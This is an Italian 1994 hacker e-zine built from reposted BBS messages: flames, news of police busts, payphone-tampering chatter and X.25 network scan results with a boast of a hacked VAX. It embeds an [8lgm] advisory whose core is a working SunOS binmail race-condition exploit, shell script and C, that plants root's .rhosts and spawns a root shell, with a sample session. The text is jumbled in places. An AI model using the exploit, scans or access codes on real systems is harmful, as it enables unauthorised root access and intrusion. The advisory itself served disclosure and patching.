S T R R O O N N N Z A A T E !! S T R R O O N NN Z A A T E SSSSSS T R R OOOO N N ZZZZZZ A A T EEEEEE !! ========================================================================= ________________________________________________________________ A grande richiesta ecco la famosa "mucca che caga" di Sxs!!!!!!! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (__) <---.) Alcuni dei messaggi sono stati "censurati" dalla redazione per evitare problemi. scriveteci e fateci sapere cosa ne pensate. proprio loro. Fate un po' voi !!! Sxs : Se sei contrario a cio' di cui sopra. con il tacito permesso di Sxs che ha postato tempo fa questa sua creazione su Ultimo Impero BBS (Si.).. pervenuteci ai ns indirizzi EMAIL o lette nei giornali ecc. io chiedo formalmente l'apertura di un'area destinata allo scambio di invettive contro la simbologia (e si badi: solo essa.MOD inserendo il loro BANNER DEL CAZZO rovinando l'intestazione dei moduli e spesso cancellando i nomi dei veri autori dei suddetti. col suo incasinatissimo CNET che nessuno ci capisce mai un CAZZO e infatti NON LO USA NESSUNO . che fa cagare mezzo mondo.. Se siete contrari a cio'.

. E' forse come svegliarsi da un sogno.Cotrozzi Massimo la vita la passa per meta' a Milano e per meta' nel suo computer. --------------------------------------Msgr. L'estate volge al termine minuto dopo minuto.Massimo Cotrozzi laureato in informatica nove annni poassati a viaggiare tra terra e cyberspazio a skoprire i segreti della informatica. ben conscio delle capacita' di moltri altri utenti in materia.: chissa' qual'e' la verita'.. Le ore piccole e le grandi donne. a capire come si violano le difese telematike e kome si possono renderle meno vulnerabili... Arkimede Area GENERALE Mitt JOE Data 28/08/94 02:17:18 Msg#1495 1/1 Object: ore 2.moderazione. Lo ingaggiano le socita' commerciali per proteggere dalle intrusioni le loro banke dati..s... E voi pensevate ke fosse finita??? da "LA STAMPA" di Sabato 20 Agosto. lo ingaggiano i giudiciper skoprire i kolpevoli dei reati di pirateria informatika. a interpretare la filosofia degli hacker e kuella dei crekers. solo ke era su un libro di sterling!!! ma il meglio deve ankora venire!!! . Le indagini telematike di uno studente ingaggiato dai giudici di milano U N D E T E C T I V E D E L C Y B E R S P A Z I O Cosi' ho katturato i pirati informatici -> Riporto solo i pezzi piu interessanti. Viva me.. -> In pratika sto stronzo si e' fatto una 15ina di sistemi ha preso le sue nui si sara' fatto passae le frekuenze per boxare e un giorno si e' svegliato e .. Joe p. Viva la Guinness. 12 ore in un posto 12 ore in un altro. --------------------------------------Decoder BBS Area: Msg#: From: To: Subj: Dibattito CyberPunx 6647 Ice Man All Ai mie tempi c'era la guerra! Date: 20 Aug 94 17:33 Read: Yes Replied: Yes Mark: ..15 Un'altra partenza... -> Ok kazzo kuesto mi sempra gia di averlo letto .

..d. Ieri sera parlavo con uno ke era al komputer da 36 ore di file ed era gia' entrato in 12 sistemi..Io passo molte ore sulle Chat-Line degli hackers." -> Ekko kon sta frase delle balle da film di 4o ordine finisko il mex.... Bho si sapessa al meno spiegare. Cotrozzi.. ops...Sono (relativo agli hackers NdS) infiltrati dovunkue e io sono infiltrato tra di loro. -> Dunke appurato ke sto kui' e' stronzo dalla testa ai piedi prosegiuamo.. Chat-line pirata???????? seee mo han fatto la 144-xxx-xxx _Hacker in linea..Blue Wave/RA v2. STROOOOOOONZOOOOOOOOOOOO!!!!!!!!!!!!] ============================================== Msg#: From: To: Subj: 7468 MainMan All News sulla merdaccia..it (MainMan) Ciao a tutti!!! .crn.ha detto.. E non ho klapito perke' usa un altro telefono ke ha paura ke sulle bbs lo traccino? Komunku l'artikolo kontinua ma direi ke ho reso l' idea!!!!! ultima kikka per finire.gaia. ".. Seguo unsando uno pseudonimo e collegandomi da un telefono diverso da kuello registrato le loro konversazioni..... Kazzo mi annoi di nuovo!!!! Ke faccio?? bhe adesso passo dalla parte opposta!!!!! Te lo diko kon tutto il kuore e spero ke sto messaggio tu lo legga karo il mio Cotrozzi S T R O N Z O ! E pregerei tutti a unirsi al mio koro!!!! Ma riprendiamo l' artikolo!! ".12 [NR] ! Origin: ---> ECN_TO +39-11-6507540 <--. Date: 02 Sep 94 00:56 Read: Yes Replied: No Mark: From: mainman@cubalibre.TURN ON YOUR BRAIN <=--------=> FREE YOUR MIND -**-!.0) SEEN-BY: 1/1 5/1 9/1 10/2 30/1 1000/1 4 1100/1 1200/1 2 5 6 7 1400/1 1500/1 SEEN-BY: 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1 [ N.. Il bello e ke sto stronzo ne va' pure fiero di kuello ke ha fatto!!!!!! Il giudizio hai posteri ma intano la nomina di STRONZO DEL MILLENIO mi pare abbia trovato il suo vincitore!!!! .r. -**..(45:1917/2.

.Ho novita` sul faccia Milano.. Ancora prima. e` noto per idiota colossale.. A egli stesso... ecco.ifmail v.P.4 ! Origin: Cyber Rights Now! (65:1400/5@cybernet) SEEN-BY: 1/1 5/1 9/1 10/2 1000/1 4 1100/1 1200/1 2 5 6 7 1400/1 2 3 4 SEEN-BY: 1400/5 1500/3 1600/1 1800/1 1900/1 2000/1 --------------------------------------Msgr.. uno di loro era rimasto lievemente ferito. prima che mi venga un esaurimento da FACCINE la configurazione del Point per LinuX..2. anche se di merda...Linux [Fox] IO SONO DIVENTATO KOSI: -=@ -#> ti sembra possibile ridursi kosi`??? A me no !!! Perkui mi devi dare.S. oltre che un quanto pare e` totalmente un infame. che e` una vecchia conoscenza al Poli a essere una testa di cazzo. Altro.. . Ma il bello deve ancora venire.. che dei gruppetti di teste di cazzo protestavano animatamente.. Arkimede Area Lo Sfogatoio Mitt JOE Data 20/06/94 20:46:22 Msg_651 1/1 Object: Quando dico certe cose vorrei crepare di botto.. era proprio il "nostro". --------------------------------------BBS DECODER Area: Dibattito CyberPunx Msg#: 5769 From: H... anche grande.. ho smesso di scrive con la K) Pleeeeeeaaaaaaaaassssssseee!!!! Date: 30 Jul 94 08:28 Read: Yes Replied: No Mark: . oppure la versione del BT che hai tu modificata per LinuxXX (acc.. Forse ricorderete quando il Leonka doveva andare in via Adriano..F. se non addirittura l'indirizzo. Comunque vedo di riuscire ad avere almeno un numero di telefono.-) -c u l8r by Brian Key fingerprint = 5B 8C 55 64 98 4E AF 64 61 E4 8A 12 2F F7 9B A1 -!. Non cio' ce ho detto. sto diventando proprio nevrastenico.. peccato non averlo steso quando ce n'era la possibilita`... To: Fox Lodari Subj: Point. in quanto ex-hacker piuttosto LAMA.

cerca un culo in cui trovare riparo. sta scoppiettando nel vaso. e. una vergogna! Date: 12 Mar 94 17:23 Read: Yes Replied: No Mark: In un messaggio di 31 Jul 94 Virtualcip dicevi a Marco Venturini Autieri: V> . Il ficcante contenuto delle tue proposizioni balorde ha gettato nello sconforto persino il mio cactus che.days Date: 05 Aug 94 21:09 Read: Yes Replied: No Mark: il g0vern0 va in vaccanza www noin va-c-anza man-c-anza e noi in suddit-anza ci riempiremo la p-anza delle stronzate concime per poveri illusi elettori (sic) ma. Forse ti puo' interessare. i maroni estivi non sono meno gonfi di quelli invernali ALLARME ALLARME! Demagogia( Bugia! ------------------------------------------------------------------------------------------------------------------ ..92 ! Origin: LiWixARD..4) SEEN-BY: 1/1 4/1 5/1 9/1 10/2 999/999 1000/1 4 1100/1 2 5 6 7 1200/1 2 SEEN-BY: 1200/5 6 1400/1 1500/1 1600/1 1800/1 1900/1 2000/1 Msg#: From: To: Subj: 5784 The creeper Spirito libero (e ficcante) Bad smell Date: 01 Aug 94 19:32 Read: Yes Replied: No Mark: A parte la puzza delle tue ascelle marce si sente anche un vago odore di vorrei ma non posso.dot. Msg#: From: To: Subj: 5895 Enzo Catania Virtualcip Un uomo. nel delirio dell'estate indiana. si sa.-!.. gia' sofferente di aerofagia. Anzi.Acropolis Mailer 0. Emilio Fede ci ha rotto i coglioni!!!! Liguori e' riuscito a fracassare anche le briciole! :-) ____ _ / ( ) 69th Point of ECN /arro/__ Azzz! Msg#: From: To: Subj: 5946 The creeper All Holy.four (65:1100/5.

co. so the true extent of any vulnerability is currently unknown.co. Those advisories deemed suitable for publication are known to the relevant organisations concerned (e. If the problem described in any advisory is discovered to affect operating systems not mentioned.security. After this period.demon. fixes are currently available. [8lgm] was created in early 1989 by several individuals with a common interest in computer security. 8lgm-bugs@bagpuss. please contact your vendor directly for patch details. the [8lgm] team have decided to release some of their back catalogue of [8lgm] advisories previously unavailable to outsiders.uk Fri May 6 22:49:11 EDT 1994 This advisory has been sent to: .demon.unix INFOHAX BUGTRAQ CERT/CC <infohax-emergency@stormking.co. An [8lgm] team member will deal with your enquiry in the strictest of confidence. However.org> -----BEGIN PGP PUBLIC KEY BLOCK----Version: 2. Please do not hesitate to contact [8lgm] with any questions related to computer security.demon.Introduction to [8lgm] Advisory Releases ---------------------------------------------------------------------------- In the light of the current move towards openness in the discussion of computer security related matters. this work has been carried out on a limited number of platforms. these vulnerabilities have not been given the publicity required so that system administrators can correct the problem. please e-mail [8lgm] at 8lgm@bagpuss.com> <chasin@crimelab. Up until 1991. giving full details so that this information can be added to the bug database. However.uk (General enquiries) This introductory file and the advisories mentioned have been forwarded to the following newsgroups and mailing lists. [8lgm] members actively used vulnerabilities to obtain access to many computer systems world-wide.g. CERT).co. comp.demon. In most cases.uk.3a mQCNAi138foAAAEEANMr/+dGdcMgmK6p61OjhUVUEnqRBvlX6PZa/1wM1hziNJgV q/VIkLqYpMUIGRYWs2NS/WgF6N1BldXib2EbZ3MNjR5fYeMnwu2amTfGkkcl9IYQ t3xj0/g69tPYJvlmcLdDx787b6UlIKT9xF+5Z5pCZp0QEyU/CtKRWea3gAuFAAUR tCFbOGxnbV0gPDhsZ21AYmFncHVzcy5kZW1vbi5jby51az4= =ivMN -----END PGP PUBLIC KEY BLOCK------------------------------------------From 8lgm@bagpuss.co.demon.com> <cert@cert. any results of research have been reported and passed onto vendors.uk (To report security flaws) 8lgm-request@bagpuss.uk (Request for [8lgm] Advisories) 8lgm@bagpuss. and provide assistance whenever required.

mail2.cut here ---------------------------#!/bin/sh # # Syntax: mailscript2 user target-file rsh-user # # This exploits a flaw in SunOS binmail(1). Please do not do this unless you have permission.100224-07. which allows files to be created in arbitrary places on the filesystem. not append to existing ones (as did the one in the previous advisory). On the other hand. Sun have produced a fix which will defeat our original script. REPEAT BY: This example demonstrates how to become root on most affected machines by creating root's . A new problem allows 0 length files to be created anywhere in the filesystem.com> =========================================================================== [8lgm]-Advisory-6. you are now virtually guaranteed to win this race. and attempts # to become the specified 'user'.1.unix BUGTRAQ CERT/CC Sun Microsystems <bugtraq@crimelab.2-May-1994 PROGRAM: binmail(1) VULNERABLE OS's: SunOS 4.UNIX. A variation on this script could easily be written to append to existing files. but the original problem remains.UNIX.rhosts file.mail. even without a race.security.24-Jan-1992. IMPACT: Any user with access to binmail(1) can become root. Create the following file. 'mailscript2': 8<--------------------------. by creating a . Note that this script will only create new files.com> <cert@cert. These files can be owned by arbitrary (usually system) users. which is what makes this problem worse than the original. DESCRIPTION: Sun released a patch 100224-07 to fix the problems described in [8lgm]-Advisory-5.org> <security-alert@sun.rhosts (/usr/bin/mail) . After 5 weeks. and is now even worse then the original! The old race condition still exists in the patched binmail(1).x with Sun's latest binmail patch .comp.

# file and using rsh.h> #include <unistd. # PATH=/usr/ucb:/usr/bin:/bin export PATH IFS=" " export IFS PROG="`basename $0`" SPOOLDIR="/var/spool/mail" # Check args if [ $# -ne 3 ]." exit 1 fi # Make the race program cat >mailrace. # # Written 1994 by [8LGM] # Please do not use this script without permission.c << 'EOF' #include <stdio. then echo "Sorry. cant race with this s cript" exit 1 else OLD_TARGET_LEN=0 fi # Delete spool file if its a link. might be in the YP passwd file fi # Check target file if [ -f $TARGET_FILE ]. then echo "$PROG: ${TARGET}'s mail file exists. and we are able if [ -h "$SPOOLDIR/$TARGET" ]. $TARGET_FILE already exists. we catch it below fi # Check mail file if [ -f "$SPOOLDIR/$TARGET" ].h> . this only works on SunOS" exit 1 fi # Check user exists grep "^$TARGET:" /etc/passwd >/dev/null 2>&1 if [ $? -ne 0 ]. then OLD_TARGET_LEN=`ls -ld $TARGET_FILE awk -F' ' '{print $4}'` 2>/dev/nul l echo "$PROG: Warning. then echo "Syntax: $PROG user target-file rsh-user" exit 1 fi TARGET="$1" TARGET_FILE="$2" RSH_USER="$3" # Check we're on SunOS if [ "x`uname -s`" != "xSunOS" ]. then echo "$PROG: Warning. then rm -f "$SPOOLDIR/$TARGET" # Dont worry about errors. $TARGET not in local passwd file" # We continue though.

c # Check we now have mailrace if [ ! -x "mailrace" ]. trying again" fi done # We won the race kill -9 $RACE_PID echo "We won the race. do echo "Sending mail to $TARGET" echo "localhost $USER" /bin/mail $TARGET sleep 10 kill -STOP $RACE_PID rm -f $SPOOLDIR/$TARGET >/dev/null 2>&1 if [ -f $SPOOLDIR/$TARGET ]. then NEW_TARGET_LEN=`ls -ld $TARGET_FILE awk -F' ' '{print $4}'` 2>/dev/n ull else NEW_TARGET_LEN=0 fi if [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ].check it out" exit 1 fi # Start mailrace RACE_PID=$! # Send mail to the user NEW_TARGET_LEN=$OLD_TARGET_LEN while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]. argv[0]). then echo "$PROG: Sorry. char *argv[]." kill -9 $RACE_PID exit 1 fi kill -CONT $RACE_PID if [ -f "$TARGET_FILE" ]. "Usage: %s mailfile newfile\n". } EOF cc -o mailrace mailrace. F_OK)).main(argc.argv) int argc. close(creat(argv[1]. { if (argc != 3) { fprintf(stderr. then echo "$PROG: couldnt compile mailrace.c . unlink(argv[1]). we lost the race . becoming $RSH_USER" rsh localhost -l $RSH_USER sh -i exit 0 8<--------------------------. then echo "We drew the race that time. argv[1]). 0600)). } symlink(argv[2]. while(access(argv[2].cant try again. exit(1).cut here ---------------------------(Lines marked with > represent user input) .

creating a link to a users mailbox would prevent that user from receiving any further mail.u are not totally secure../mailscript2 sysdiag /. For example. Sun's 100224-07 patch does this check after opening the file.] .UNIX.. This checks that the mailbox is not a link.24-Jan-1992. Other methods discussed on c. due to /var/spool/mail being world writeable. For a full discussion. Denial of service attacks are possible.] ----.Check what root users are on the system: > sysdiag sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sund iag +::0:0::: We choose a user with UID 0.rhosts root Sending mail to sysdiag kill: process 6268: No such process kill: process 6268: No such process kill: process 6268: No such process We won the race.. checked the user's mailbox with an lstat(2) before opening it. We believe that the only correct way to fix this problem is to make the mail spool directory o-w. see [8lgm]-Advisory-5. the target file is /.. The original code. This simply defeat's the script given in the above advisory. Service unavailable [. and the user to rsh to on success is root: > > % chmod 700 mailscript2 % . binmail would return mail to sender with the following message: [.rhosts.. The user is sysdiag. it is NOT a fix for the problem.mail.s.letter 554 user.. but without a /var/spool/mail/<username> file: > % ls -l /var/spool/mail/sysdiag /var/spool/mail/sysdiag not found % grep :0: /etc/passwd root:*:0:1:Operator:/:/bin/csh sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/ Execute mailscript2. becoming root # DISCUSSION: This problem exists because /var/spool/mail is rwxrwxrwt.Transcript of session follows ----mail: /var/spool/mail/user has more than one link or is a symbolic link mail: /var/spool/mail/user: cannot append Mail saved in dead.

The workaround in [8lgm]-Advisory-5. lui e' iscritto all'associazione noleggiatori che aveva gia' impugnato la questione a milano e roma. Please do *not* send information on other bugs to this address . 2. e fin qui storia risentita mille volte. Contact your vendor for a workable patch.This problem can only be prevented by adopting a mode 775 or mode 755 mail spool directory.uk (General enquiries) --------------------------------------Area: Dibattito CyberPunx Msg#: 6345 From: Captain Swing To: All Subj: Sequestro di un cd-noleggio >una piccola sturiellet estiva. ecc.co.security. We welcome reports about which platforms this flaw does or does not exist on.mail..uk is intended to be used by people wishing to report which platforms/OS's the bugs in our advisories are present on.demon.uk (Request for [8lgm] Advisories) 8lgm@bagpuss.co.demon. un mio amico che noleggia(va) cd e' stato colpito da mandato di sequestro relativamente al noleggio.demon.demon.UNIX.co..uk 8lgm-request@bagpuss.uk (To report security flaws) (Request for [8lgm] Advisories) (General enquiries) System Administrators are encouraged to contact us for any other information they may require about the problems described in this advisory. ecc..24-Jan-1992 remains valid and is still required.demon.uk (To report security flaws) 8lgm-request@bagpuss..co.co. WORKAROUND & FIX: 1.co. FEEDBACK AND CONTACT INFORMATION: 8lgm-bugs@bagpuss.unix instead.co.demon.. ma la gdf non si sarebbe mai aspettata di trovare nel bugigattolo del mio amico anche computer e disketti!! MARONN!!! di corsa dal pm a riferire ed ecco Date: 07 Aug 94 20:43 Read: Yes Replied: No Mark: .demon. =========================================================================== -----------------------------------------------------------------------8lgm-bugs@bagpuss. NB: 8lgm-bugs@bagpuss.report them to your vendor and/or comp.uk 8lgm@bagpuss..

. si sono ripresentati con tanto di manualetto della BSA che spiega cosa si puo' fare (niente) e cosa non si puo' fare (tutto).f1...nervous..nervous..com> Captain.. ma ahime' il tizio aveva pwdato tutto. gia' incasinato con storie di noleggio CD e videogames.z65.com (Captain Swing) writes: >dicendogli "guarda! tutta la notte ci ho messo....Swing@p4... software sospetto. un 2000 disks e speranzosa di trovare kissa' cosa negli hd. per farla breve.che il giorno dopo il mandato diventa relativo anche alla detenzione abusiva di materiale copyright. ma guarda che figata!!!" Non e' niente.... ma guarda che figata!!!" . ma oltre al danno la beffa: dopo un mesetto che negli uffici della gdf si lavorava alacremente alla perquisizione di suddetto materiale. le abbiamo trovate in un giornale..n1100." rispondono.. ovvia la risposta del tizio. io un po' meno. insieme al famigerato diskettino trova-(C). scritte simpatiche.f1.. TE CAPI'?!?!?!? E QUESTA NON E' FRODE? NON E' SFRUTTAMENTO ABUSIVO DELLE CREAZIONI ARTISTICHE DI UN AUTORE? A LUI I DIRITTI NON SPETTANO? rob de mat. smazzandosi come 1 pazzo. senno' ne apriamo 3!". mi pare giusto e IT> doveroso ! . ho detto INTASCARE non SEQUESTRARE!! I figli di questi bravi finanzieri si' che saranno contenti. niente.. disegnini) che lui realizzava su ordinazione per farsi un po' di pubblicita'.... Igor Tosolini scrisse a Luke Lone: IT> ricerchiamo quello che ci e' negato dalla $ip . Msg#: From: To: Subj: 6565 Xxxxxxxx xxxxx Captain Swing Re: Sequestro di un cd-noleggio Date: 18 Aug 94 02:33 Read: Yes Replied: No Mark: In article <2e454ab4@p4. macchine atte alla duplicazione di programmi bla bla bla..gateway. mentre i figli dei finanzieri magari stanno distribuendo le suddette stampe agli amici dicendogli "guarda! tutta la notte ci ho messo.... no problem: la proposta e' stata :"se ci dai le pw chiudiamo un occhio.sob. "ah.z65..gateway.. carica dei 3 pc del tizio..... il tizio li va a trovare per esternare la sua dose settimanale di bestemmie e trova appesi ai muri dell'ufficio le stampe decorative (cornici. durante la perquisizione nella mia abitazione in seguito alla triste storia che noi tutti sappiamo (Fido Bust) i bravi finanzieri hanno pensato bene di intascarsi due Swatch Crono da collezione. "e quelle? " gli fa lui.n1100. ora il tizio non puo' lavorare. e il pur bravo (!) tecnico non riusciva proprio a crackarle. stavolta la gdf e' andata via molto + contenta.. Xxxxxxxx Msg#: From: To: Subj: 6654 Sent Local Luke Lone Igor Tosolini Re: Phrakka la cabina Date: 21 Aug 94 12:43 Read: Yes Replied: No Mark: Vagando nel cyberspazio.

pago. ma e` molto vantaggioso. Alle spalle di questo terminale. i fili che arrivano ad una cabina andassero in cortocircuito o qualcuno li tagliasse. L'apparecchio che si vede per la strada non e' altro che un terminale stupido stupido. per puro caso O:-). Il che e' tutto dire :-)) LL> Le cabine sono anche abilitate alle chiamate internazionali. poi li ci pensa l'essere umano a decidere cosa fare. scatterebbe l'allarme nucleare in centrale o nessuno si accorgerebbe di niente fino alla segnalazione "manuale" del guasto? L'apparecchiatura a monte si accorge della variazione e invia in c. molto sof LL> LL> LL> LL> Se. l'importante e` che abbia un HD da 10-20 mega e una UART 16550 a cui abbinare un pocket modem.le un allarme "Urgente Telefonia Pubblica".-) Buona fortuna! Guarda che non e` mica facile: e` gia` un problema togliere le viti arrugginite (se ci sono) che fissano l'intelaiatura dei telefoni. io seguo questa politica: se il prezzo e` accessibile.. >-]]] Servirebbe anche attrezzarsi opportunamente: c'e` nessuno che ha qualche idea su un PC portatile compattissimo ed ancor piu` economico? La CPU non importa.. IT> Dai . tra Fido e da qua riuscrai a racimolare informzioni a sufficenza Ecco un primo cross-report: ============================= CUT HERE ========================= Area: Telefonia e comunicazioni Msg#: 290 Rec'd From: Stefano Zano To: Luca Losito Subj: Monitoraggio cabine Date: 16 Aug 94 17:07:34 Read: Yes Replied: Yes Mark: Ciao. Questo allarme viene trasferito al centro di competenza. Forse con piede di porco e fiamma ossidrica. rubo. Si. basta anche uno schifido 8086. in luoghi non accessibili.-) IT> qua siamo in tanti qualcuno esperto ha fatto delle prove ? IT> altrimenti dovro' farle io O. E` un comportamento che manda in bestia gli economisti. Essendo apparecchiature accessibili a tutti (brave persone e vandali) hanno un monitoraggio molto spinto. c'e' una unita' di controllo molto sofisticata che e' in continuo monitoraggio.Piu` che altro. . ma LL> ovviamente il contascatti parte a mitraglia: se la cosa succedesse un LL> po' troppo spesso alla stessa cabina. se non lo e`. Luca! Ho letto il messaggio da te inviato a All il 14 Aug 94 e quoto: LL> Mi chiedevo da un po' di tempo se le cabine telefoniche siano in qualche LL> modo "monitorate".. perche` scombussola tutte le loro delicate teorie su domanda e offerta. potrebbero insospettirsi? . Ogni minima variazione dallo stato funzionale standard viene rilevato.

Long live the hacking. Come ti dicevo prima ogni variazione anomala viene segnalata. Potrebbe essere internet.. Stefano -wmw- -!.. plasmandolo . __ _ _ _ < _ -!.senza controlli da parte di governi . Ovviamente questa e' solo la teoria o meglio.. Solo cosi' infatti si puo' giungere al formarsi di una realta' nuova....Blue Wave/RA v2. In questo caso il sistema a monte mette fuori servizio autonomamente l'apparecchio per errore sugli incassi.... Ulteriori approfondimenti nei prossimi giorni. LL> Esiste un qualche controllo di corrispondenza tra il numero di scatti LL> registrati per ogni cabina e le operazioni effettuate dai rispettivi LL> lettori di schede magnetiche? Questo non te lo so dire con esattezza.. e costruendo qualcosa di nuovo.sicuramente dovra' essere libera come non mai.... ma credo che non siamo molto lontani dalla "rete totale" o "rete mondiale".cio' che sembra essere chaos (e lo e') si organizza prendendo il messaggio .Comma_22/2+ ! Origin: E le stelle stanno a guardare (2:332/416.12 [NR] ! Origin: !!DECODER BBS-.Si. :-) Ciao.4205) ======================== END CUT ============================== Stefano Zano e` un dipendente di una societa` concessionaria della $ip.... che si occupa dell'installazione di centrali telefoniche: le sue informazioni sono attendibilissime...<<Power2ThePeople>> 14:00-08:00 * 2-29527597 (65:1200/1) Msg#: From: To: Subj: 5597 Virtualcip All Caos e reti Date: 24 Jul 94 17:46 Read: Yes Replied: No Mark: Hello All! Quest'area sta diventando sempre piu' la dimostrazione tangibile di come un sistema chaotico autorganizzato sia superiore . Guardate cosa succede quando un utente immette un messaggio. in quanto a complessita'. forse ho letto troppi libri .chissa'.. come funziona sulla carta.... multinazionali e media "normali".. alla somma delle sue parti. ma propenderei per il si.qualcosa che prima non c'era! Questa mi sembra una cosa stupenda . .. La realta' e' tutta da scoprire.

Sono tre ragazzi di Milano. ma effettuate su linee di interconnessioni tra computer. E non siamo neanche tanto lontano da questi giorni.. Si formera' un "superorganismo".. quest'ultima affermazione prendetela con le molle ma state ugualmente molto attenti...l'importante e'.... La scena oggi si interroga. quindi non la faro' . MILANO..... che palle.. Virtualcip Msg#: From: To: Subj: 5916 Zeus Kissakie' All Busts.. che l'intelligenza totale sara' superiore alla somma delle singole entita' che ne fanno parte (gli utenti). Saranno sicuramente giorni di luce nel buio della storia umana. smascherati tre pirati informatici. del tutto simili a quelle telefonich.. riflette sui rischi potenziali e reali. quali Arkie ed altre.... come dicevo prima .Chiamiamola "societa' telematica" ..... ciascuno dei quali ha agito per proprio conto... Pare che se siete su centrale elettromeccanica corriate molti meno rischi.. la Digos di Milano ha scoperto tre giovani "pirati informatici". poi semmai ne possiamo discutere.. I tipi erano abbastanza noti su messaggerie di tipo videotel. I coinvolti di Milano non sarebbero una ma due persone.lascio ognuno libero di immaginarsele . quindi dopo quella dell'Italian Crackdown. in eta' compresa tra i 17 e i 25 anni.. Tutti e tre (quattro) sono stati scoperti poiche' utilizzavano la NUI di Milano BIBXXX. Date: 04 Aug 94 11:20 Read: Yes Replied: No Mark: Dalla Stampa di oggi Mercoledi' 03/08/94 Pag 11 Milano.. Attraverso una serie di intercittazioni telematiche. uno di Roma e uno di Siracusa. Voci sentite in giro. "gaia" .una mente formata da milioni di menti.. Voi che ne pensate ? Hello. e solo nei prossimi giorni sapremo qualcosa di piu'.. cya Z@K --------------------------------------- .pensate alle implicazioni! Sono cosi' tante che mi viene il mal di testa solo a pensare di farne una piccola descrizione ... Pare anche che la compagnia telefonica non abbia chiuso quella via di boxing (probabilmente il paese piu' usato) per "bustare" altre persone. A voi le riflessioni. Secondo altri giornali sono stati denunciati per truffa anche per l'utilizzo un programma di blueboxing (i bene informati parlano di bluebeep). nota alla scena hacking ormai da mesi e usata da un vastissimo gruppo di persone.... Utilizzavano i piu' disparati servizi informatici grazie ai codici segreti di una azienda alla quale venivano poi automaticamente addebitati i costi delle "piraterie". "rete intelligente" o come volete voi. Un'ultima cosa: l'inchiesta pare sia partita due mesi fa.

Msgr Arkimede .*:D (modificata dalla Redazione !!) ^^^^^^^^^^^^^^^^^^^^^ Ciao! cosa fa il tuo processore dopo i fatidici 30 minuti di overclock? e' una cosa che mi preme molto perche' vorrei sapere se in caso di problemi me ne posso accorgere o meno (con relative lugubri conseguenze.XX-XX-XXXXXXX (2:XXX/XXX) --------------------------------------Mitt Xxxx Xxxxxxx Data 07/01/94 21:49:15 Msg_XXX 1/2 Object:Scanning NUA Finlandia (telecom) 02442050xx 02 pw 03 pw 05 mute 08 x25(pw) 09 OCC 11 OCC (busy) 12 mute 16 com .Un msg di Drake bha . prova 167823132 . sembra proprio un pad itapac dai messaggi che da.....poi butta fuori 23 Telebox E-mail 24 mute 25 vax 33 mute 39 Hewlett Packard 46 teletel ??? 52 MHP201A 54 TELEBOX E-Mail 55 " " 69 mute 73 74 mute anche 73 75 Hewlett Packard 78 mute 82 open session HELLO 85 telebox E-Mail 86 Telebox E-Mail 99 mute bye --------------------------------------- . si entra pure senza nessuna password --------------------------------------Pazzia in Fidonet !!! Ä Area: [Echo] Ms-Dos Hardware ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Msg#: 3465 Date: XX Aug 94 15:06 From: Xaxxxx Xxxxxxx Read: Yes Replied: No To: Xxxxx Xxxxxxx Mark: Subj: Super 486DX33 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ NK4QKxx-0310071300114 <<<<<<<---------..) -!! Origin: Xxxxxxx Xxxxxxxxxx .

servizio a pag. vogliono imitare i situazionisti francesi Curoi di maiale.. interiora d'animali diversi che lasciano di stucco la gente sui mezzi pubblici.BOLOGNA DI GIOVEDI' 14 LUGLIO 1994 DEDICA UN'INTERA PAGINA (!) ALLE PROVOCAZIONI "ORRORISTE"! Titoli a pag.. cervella. 201 (fino a 411. e ora il gioco gli e' sfuggito di mano ATTENTI AGLI ORRORISTI Coprono auto e bus di frattaglie. una bella BBS con CHAT!) Segue una lista delle aree scannate. Lo scan Sprint ha dato i seguenti risultati: 1) beccato dec server con pad che chiama quasi tutte le nazioni. ai giardini. per strada. "Ma e' arte" Un gruppo di studenti nascosti da pseudonimi si sono conosciuti attraverso il computer..I: Budella di animali "per rompere la routine". per strada. interiora d'animali diversi che lasciano di stucco la gente sugli autobus. Passanti distratti che vengono colti di sorpresa da oggettini disgustosi come teste di tacchino putrefatte sul marciapiede.V: CHE HORROR. un divertimento splatter travestito da provocazione intellettuale e' di scena a Bologna. "Magari e' qualcuno che vuole madarci dei messaggi e mettersi in contatto con noi" di Benedetta Cucci.. Cuori. purtroppo e' lento. Potremmo chiamarla "frattagliamania". Signore che si avvicinano a bambini per scoprire che stanno .Mitt Xxxxxxxxxxx Data 09/03/94 21:38:20 Msg_XXXX 1/2 Object: Risultato & Report dello Scan. V e andiamo a pag.cioe' 20100411) 203 fino a 588 207 fino a 21 (sembra morta) 212 fino a 1116 219 fino a 123 --------------------------------------BBS DECODER Area: News dai Centri Sociali Msg#: 5172 From: mastro ciliegia To: All Subj: L'orrorismo a Bologna Date: 14 Jul 94 02:15 Read: Yes Replied: No Mark: LA REPUBBLICA .. udite udite. L'ARTE DELLE INTERIORA Cuori di maiale su auto e bus e ora spuntano gli imitatori UN MACABRO giochino di societa'. 2) Beccati svariati vax ed hackerato uno con full privs (e presto. ai giardini E c'e' chi ha deciso di seguire le loro orme.

